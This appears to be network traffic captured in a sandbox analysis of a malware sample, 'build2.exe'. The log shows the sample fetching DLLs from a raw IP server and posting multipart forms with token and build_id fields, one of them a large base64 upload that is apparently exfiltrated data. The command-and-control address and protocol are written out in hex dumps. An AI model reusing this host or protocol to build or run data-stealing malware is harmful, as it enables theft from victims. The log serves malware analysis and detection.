2024-04-04 15:49:40 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-04-04 15:49:40 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
2024-04-04 15:49:40 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-04-04 15:49:40 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.10	49802	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:40 UTC	225	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Cache-Control: no-cache
2024-04-04 15:49:41 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:41 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
2024-04-04 15:49:41 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-04-04 15:49:41 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-04-04 15:49:42 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
2024-04-04 15:49:42 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-04-04 15:49:42 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.10	49807	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:43 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:43 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------KJKKJKEHDBGIDGDHCFHICont
2024-04-04 15:49:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:44 UTC	18	IN	Data Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 8YmxvY2s=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.10	49811	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:45 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:45 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------JKKKJJJKJKFHJJJJECBFContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------JKKKJJJKJKFHJJJJECBFContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------JKKKJJJKJKFHJJJJECBFCont
2024-04-04 15:49:46 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.10	49814	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:46 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:46 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 47 48 44 47 49 45 47 43 42 46 49 45 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 47 48 44 47 49 45 47 43 42 46 49 45 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 47 48 44 47 49 45 47 43 42 46 49 45 47 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------GCBGCGHDGIEGCBFIEGCBContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------GCBGCGHDGIEGCBFIEGCBContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------GCBGCGHDGIEGCBFIEGCBCont
2024-04-04 15:49:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.10	49816	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:48 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAEHCAEGDHJKFHJKFIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:48 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------CBAEHCAEGDHJKFHJKFIJCont
2024-04-04 15:49:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:49 UTC	18	IN	Data Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 8YmxvY2s=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.10	49817	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:50 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDBGDHDAECBGDHJKFID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 90229 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:50 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------EHDBGDHDAECBGDHJKFIDCont
2024-04-04 15:49:50 UTC	16355	OUT	Data Raw: 70 4b 64 53 55 44 47 2f 72 53 2f 77 41 71 43 4b 4b 59 43 64 66 70 53 64 36 58 6d 69 67 59 6d 50 78 7a 53 59 39 61 58 38 4b 54 74 33 6f 41 44 53 64 76 61 6c 70 4b 42 69 47 6a 46 47 50 77 70 61 42 69 48 6b 30 64 42 78 52 6a 31 70 4d 55 41 47 61 4d 2b 6e 35 30 65 6e 4e 42 34 78 32 6f 47 4a 52 6a 50 72 52 51 50 59 2f 53 67 42 4d 6d 69 6c 50 72 53 45 55 44 41 44 50 4e 48 72 51 42 39 61 50 65 67 42 43 4b 58 31 37 2f 41 46 6f 50 46 4a 39 61 42 68 52 78 2f 77 44 71 6f 37 55 6c 41 43 39 76 61 6b 36 30 6f 36 63 64 54 53 55 41 48 61 6b 34 7a 53 2f 70 39 61 54 46 41 77 78 69 67 38 5a 78 52 52 51 42 33 78 70 72 74 74 52 6d 39 42 6d 6e 55 68 35 47 44 57 5a 38 71 55 4c 69 66 54 70 4a 70 4e 4f 2f 74 61 34 44 66 32 63 59 63 65 54 47 4c 55 58 4a 50 6e 42 6a 4e 35 75 65 47 Data Ascii: pKdSUDG/rS/wAqCKKYCdfpSd6XmigYmPxzSY9aX8KTt3oADSdvalpKBiGjFGPwpaBiHk0dBxRj1pMUAGaM+n50enNB4x2oGJRjPrRQPY/SgBMmilPrSEUDADPNHrQB9aPegBCKX17/AFoPFJ9aBhRx/wDqo7UlAC9vak60o6cdTSUAHak4zS/p9aTFAwxig8ZxRRQB3xprttRm9BmnUh5GDWZ8qULifTpJpNO/ta4Df2cYceTGLUXJPnBjN5ueG
2024-04-04 15:49:50 UTC	16355	OUT	Data Raw: 33 6b 4b 54 6f 30 2b 6e 51 72 63 51 78 7a 74 65 79 6f 36 72 48 49 32 30 53 42 67 71 59 77 65 6f 50 48 49 4f 65 44 53 66 62 6b 4f 71 69 31 6e 73 37 2f 54 52 48 76 61 34 6a 76 43 47 5a 59 30 42 5a 6e 55 68 56 42 47 30 45 6a 67 6a 6a 67 6e 4e 5a 31 36 62 43 62 54 76 73 48 39 6d 61 6a 43 70 6d 6a 61 52 5a 4a 56 6d 4e 7a 47 76 2f 4c 50 65 41 6e 6c 67 64 63 68 58 79 63 5a 34 46 54 4c 63 33 6b 56 70 48 5a 36 66 70 68 6a 68 6a 74 6e 74 34 58 76 33 53 36 5a 42 4a 49 48 6b 79 72 52 37 47 42 41 43 67 62 52 67 46 75 70 4e 4e 31 4d 58 7a 4e 51 54 38 72 2b 6e 2b 59 6c 52 79 2f 6b 54 71 4f 4b 62 33 74 35 50 5a 66 49 74 6e 55 72 47 4f 34 76 4a 4a 5a 5a 50 73 4e 74 41 74 34 47 55 44 7a 4a 49 58 32 2b 57 42 32 33 45 75 6f 4a 78 67 63 6e 48 47 4b 64 5a 36 72 70 6c 31 50 70 Data Ascii: 3kKTo0+nQrcQxzteyo6rHI20SBgqYweoPHIOeDSfbkOqi1ns7/TRHva4jvCGZY0BZnUhVBG0EjgjjgnNZ16bCbTvsH9majCpmjaRZJVmNzGv/LPeAnlgdchXycZ4FTLc3kVpHZ6fphjhjtnt4Xv3S6ZBJIHkyrR7GBACgbRgFupNN1MXzNQT8r+n+YlRy/kTqOKb3t5PZfItnUrGO4vJJZZPsNtAt4GUDzJIX2+WB23EuoJxgcnHGKdZ6rpl1Pp
